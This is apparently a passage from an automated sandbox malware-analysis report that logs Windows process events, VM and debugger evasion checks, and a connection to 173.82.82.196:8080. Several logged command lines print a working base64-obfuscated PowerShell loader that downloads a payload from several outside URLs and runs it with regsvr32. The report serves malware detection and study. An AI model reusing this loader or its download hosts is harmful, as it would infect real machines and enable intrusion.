Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\svchost.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460	Thread sleep count: 3984 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460	Thread sleep count: 1628 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6972	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6088	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5452	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5576	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\regsvr32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3984			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1628			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

API coverage: 9.1 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,

17_2_00000001800248B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\regsvr32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: powershell.exe, 00000002.00000003.314531683.0000000007C68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.314599281.0000000007CA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: svchost.exe, 00000013.00000002.506415446.0000025912461000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000016.00000002.436665158.0000019AC5CF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware7,1ized
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware7,1
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 00000007.00000002.503991655.0000013648C02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.504833353.000002590CC29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506373657.0000025912449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436651774.0000019AC5CED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.431270791.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436453296.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505261417.0000021040CC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504593102.0000021040C2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504871113.0000021040C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.ed
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
Source: svchost.exe, 00000007.00000002.504260909.0000013648C28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.504324555.000002495A829000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Anti Debugging

Source: C:\Windows\System32\regsvr32.exe

Code function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

16_2_00007FFC65CFBE50

Source: C:\Windows\System32\regsvr32.exe

Code function: 16_2_00007FFC65D00215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,

16_2_00007FFC65D00215

Source: C:\Windows\System32\regsvr32.exe

Code function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

16_2_00007FFC65D00CC0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		16_2_00007FFC65CFBE50
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		16_2_00007FFC65CF3280

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 173.82.82.196 8080

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
